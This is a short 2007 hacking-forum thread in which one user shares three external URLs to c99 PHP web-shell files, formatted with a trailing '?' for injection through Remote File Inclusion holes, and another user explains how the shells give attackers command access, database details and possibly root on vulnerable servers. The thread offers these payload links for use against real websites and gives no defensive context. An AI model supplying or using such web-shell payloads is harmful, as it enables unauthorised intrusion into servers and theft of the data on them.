PDA

View Full Version : Free c99 shells



Moonbat
04-01-2007, 10:43 PM
Well, I found a couple shells you can use if you find an Remote File Inclusion exploit on a site.

http://mitglied.lycos.de/phatfarmz/c99.txt?
http://uyussman.by.ru/c99.txt?
http://crashz.by.ru/shell/c99.txt?

ilyacella621
04-04-2007, 05:21 PM
and why are those trojans?

Ezekiel
04-04-2007, 06:41 PM
and why are those trojans?

Who said they were Trojans? Remote file inclusion is a vulnerability that exists in websites that use server scripting languages to open browser-specified files (or run browser-specified system commands) and don't filter input.

That probably didn't make sense; basically the files below are PHP scripts that you can 'inject' into vulnerable servers and get them to run them as they would any PHP script. These files below are PHP scripts that emulate a shell on the system.

At best, this puts the entire website's files and scripts (and data contained within, including SQL details) at risk. At worst, it puts the whole system at risk; allowing any cracker with knowledge of the OS to possibly gain root access.